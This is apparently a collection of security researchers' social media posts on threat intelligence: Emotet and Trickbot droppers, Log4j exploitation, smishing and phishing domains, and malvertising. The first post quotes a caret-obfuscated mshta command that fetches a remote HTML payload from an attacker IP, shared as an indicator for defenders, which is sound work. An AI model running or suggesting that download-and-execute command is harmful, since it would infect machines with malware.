#Emotet and #Trickbot once again similarity 🚨 #DFIR #BlueTeam command-line bypass ❗️ #LOLBin Mshta lolbas-project.github.io/lolbas/Binarie… EMOTET Excel > cmd /c m^sh^t^a h^tt^p^:/^/87.251.85[.]100/PP/pp[.]html TRICKBOT Excel > cmd /c m^sh^t^a h^tt^p^:/^/87.251.85[.]100/love/love3[.]html

GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. greynoise.io/viz/query/?gnq…

The latest detail on the Apache Log4j 2 incident from Anomali Threat Research Intel Analysts, including guidance on intel-driven alerting, detection and response. #log4j #log4shell #cybersecurity #infosec #java #Apache #CVE202144228 #vuln #threatintel hubs.ly/Q010NGzL0

The latest from Anomali Cyber Watch: Equation Group’s Post-Exploitation Framework, Decentralized Finance (DeFi) Protocol Exploited, Third #Log4j Vulnerability, and More. #Equation #Cybersecurity #Cybercrime #threatintelligence #Exploit hubs.ly/Q011jvVk0

New #smishing scam targeting #NewHampshire cell owners, judging by the code, a similar template was used against New York. Don't fall for it, not an official website, phishing for your social security and other information. #covidscam #IoCs: doh-dmv[.]com, registered to a gmail

But what proved key in the end was the Bitly short link Оксана Тінько uploaded along with the malicious accoounts-google URL. It tied back to a hyperactive bitly user who was creating tons of shortlinks — all of them pointing to similar phishing sites.

Interesting note. The "chrisro[.]fun" domain is registered to "SYKES LATIN AMERICA" and in this screenshot below we can see some tool in the taskbar named "SYKES Secur...".

Strange #smishing spam message: when opened in sandboxes this nyxk2[.]xyz...(no longer working) opened #Russian State TV domains 1tv[.]ru and 1tv[.]com

Nigerian princes are replaced by #Russian oligarchs! #scam #fraud #419

🚨#Emotet Update🚨 - Looks like Ivan laid an egg for easter and has been busy. As of about 14:00UTC today 2022/04/18 - Emotet on Epoch 4 has switched over to using 64-bit loaders and stealer modules. Previously everything was 32-bit except for occasional loader shenanigans. 1/x

It's time to tap the large reservoir of talent with analytical skills to help tackle the #cybersecurity talent shortage. ow.ly/hgvy50JQN0l by Anomali's Gage via Dark Reading #talentshortage

Boston Security September 2023 Meetup RSVPs are live. meetu.ps/e/MrgF5/1nr1z/i

At least one malicious Facebook profile similar to the NodeStealer 2.1 #malvertising campaign reported by Bitdefender is still online. #CyberSecurity